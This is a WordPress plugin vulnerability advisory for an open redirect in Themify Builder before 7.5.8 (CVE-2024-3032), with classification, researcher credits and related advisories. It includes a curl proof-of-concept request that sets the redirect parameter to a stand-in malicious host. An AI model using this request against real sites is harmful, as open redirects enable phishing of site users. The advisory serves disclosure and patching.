WordPress Plugin Vulnerabilities

Themify Builder < 7.5.8 - Open Redirect

Description

The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue

Proof of Concept

curl -kvL https://www.example.com/wp-login.php \
     -e http://arbitrary-referer \
     -d "log=invalid_username&pwd=invalid_password&tb_login=1&tb_redirect_fail=https://malicious-site.com"


- `https://www.example.com` should be replaced with the affected WordPress site URL.
- The request triggers a 302 redirect to the URL specified in `tb_redirect_fail`.

Affects Plugins

Plugin icon
themify-builder
Fixed in 7.5.8

References

CVE
CVE-2024-3032

Classification

Type
REDIRECT
OWASP top 10
A1: Injection
CWE
CWE-601

Miscellaneous

Original Researcher
Valentin LOBSTEIN
Submitter
Valentin LOBSTEIN
Submitter website
https://chocapikk.com
Submitter twitter
Chocapikk_
Verified
Yes
WPVDB ID
d130a60c-c36b-4994-9b0e-e52cd7f99387

Timeline

Publicly Published
2024-05-23 (about 1 months ago)
Added
2024-05-23 (about 1 months ago)
Last Updated
2024-05-23 (about 1 months ago)

Other

Published
Title
Published
2024-01-30
Title
Payment Gateway for Telcell < 2.0.4 - Unauthenticated Open Redirect
Published
2014-08-01
Title
WordPress 3.0 - 3.6 Crafted String URL Redirect Restriction Bypass
Published
2015-07-25
Title
Music Store <= 1.0.14 - Referer Header Open Redirect
Published
2016-06-21
Title
WordPress 4.5.2 - Redirect Bypass
Published
2019-10-08
Title
All In One WP Security & Firewall <= 4.4.1 - Open Redirect & Hidden Login Page Exposure